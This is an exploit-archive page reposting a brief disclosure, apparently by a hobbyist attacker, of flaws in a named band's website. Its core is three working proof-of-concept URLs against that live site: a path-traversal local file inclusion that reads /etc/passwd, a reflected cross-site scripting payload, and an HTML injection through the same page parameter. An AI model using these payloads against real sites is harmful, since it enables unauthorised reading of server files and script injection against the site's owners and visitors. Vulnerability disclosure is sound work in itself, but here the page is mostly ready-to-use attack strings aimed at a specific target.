Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021060127

Below is a copy:

The Ravage Website Multiple Vulnerabilities
what's up security guys, rmulo (sculo xxi) in the your network!

website: www.ravagedband.com
vulnerabilities: local file inclusion, cross-site scripting, html injection

proof of concept

lfi example: https://www.ravagedband.com/index.php?page=../../../../../../../../../etc/passwd

xss example: https://www.ravagedband.com/index.php?page=%3Cscript%3Ealert(%27your%20security%20is%20low%27)%3C/script%3E

html injection example: https://www.ravagedband.com/index.php?page=<p>your security is low</p>

the end!

Copyright ©2021 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.